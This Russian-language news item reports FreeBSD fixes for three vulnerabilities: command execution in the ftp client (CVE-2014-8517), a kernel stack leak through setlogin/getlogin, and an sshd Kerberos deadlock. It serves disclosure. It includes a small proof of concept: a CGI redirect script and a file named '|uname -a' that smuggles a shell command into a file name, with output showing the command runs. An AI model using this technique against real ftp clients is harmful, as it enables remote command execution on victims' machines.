Во FreeBSD устранены уязвимости в ftp, setlogin и sshd

5 ноября 2014 года

Разработчики FreeBSD опубликовали серию уведомлений об устранении уязвимостей:

• "CVE-2014-8517" - опасная уязвимость в клиенте ftp, которая может привести к выполнению кода при доступе к подконтрольному злоумышленнику серверу с использованием неинтерактивного режима работы утилиты ftp. При запросе с использованием URL утилита ftp поддерживает загрузку данных не только по FTP, но и по протоколу HTTP, в том числе обрабатывает операции перенаправления на другой URL. В случае если явно через опцию "-o" не указан путь к файлу для сохранения данных, осуществляется использование части пути из URL в качестве имени файла. Атакующий может организовать редирект на специально оформленный файл, который приведёт к выполнению заданной команды (например, на сервере можно создать файл с именем "|uname -a" и в ответ на запрос вернуть редирект на него "Location: http://site/%7Cuname%20-a'"). Проблема проявляется во всех поддерживаемых выпусках FreeBSD. Аналогичная проблема устранена в ftp-клиенте NetBSD и возможно присутствует в других BSD-системах.

Техника атаки:

a20$ pwd
/var/www/cgi-bin
a20$ ls -l
total 4
-rwxr-xr-x 1 root wheel 159 Oct 14 02:02 redirect
-rwxr-xr-x 1 root wheel 178 Oct 14 01:54 |uname -a
a20$ cat redirect
#!/bin/sh
echo 'Status: 302 Found'
echo 'Content-Type: text/html'
echo 'Connection: keep-alive'
echo 'Location: http://192.168.2.19/cgi-bin/|uname%20-a'
echo
a20$

a20$ ftp http://localhost/cgi-bin/redirect
Trying ::1:80 ...
ftp: Can't connect to `::1:80': Connection refused
Trying 127.0.0.1:80 ...
Requesting http://localhost/cgi-bin/redirect
Redirected to http://192.168.2.19/cgi-bin/|uname%20-a
Requesting http://192.168.2.19/cgi-bin/|uname%20-a
32 101.46 KiB/s
32 bytes retrieved in 00:00 (78.51 KiB/s)
NetBSD a20 7.99.1 NetBSD 7.99.1 (CUBIEBOARD) #113: Sun Oct 26 12:05:36
ADT 2014
Jared@Jared-PC:/cygdrive/d/netbsd/src/sys/arch/evbarm/compile/obj/CUBIE
BOARD evbarm
a20$

• "CVE-2014-8476" - утечка содержимого стека ядра FreeBSD через манипуляцию с системными вызовами setlogin(2) и getlogin(2). Проблема вызвана тем, что для логина в setlogin выделяется неочищенный буфер фиксированного размера, а getlogin возвращает полное содержимое этого буфера, а не только часть в которой содержится логин (т.е. можно прочитать хвост буфера за нулевым символом, в котором теоретически могут находиться до 16-32 байт с остатками важных данных).
• "CVE-2014-8475" - проблема сборки sshd c поддержкой Kerberos 5 может привести к инициированию отказа в обслуживании (при обработке входящих запросов можно вызвать взаимную блокировку, которая некоторые время не позволит принимать новые соединения). Проблема проявляется только в ветках FreeBSD 9.x и 10.x.

Дополнительно сообщается об устранении не связанной с безопасностью ошибки, которая может привести к нарушению целостности кэша при доступе к ZFS-разделу поверх NFSv4.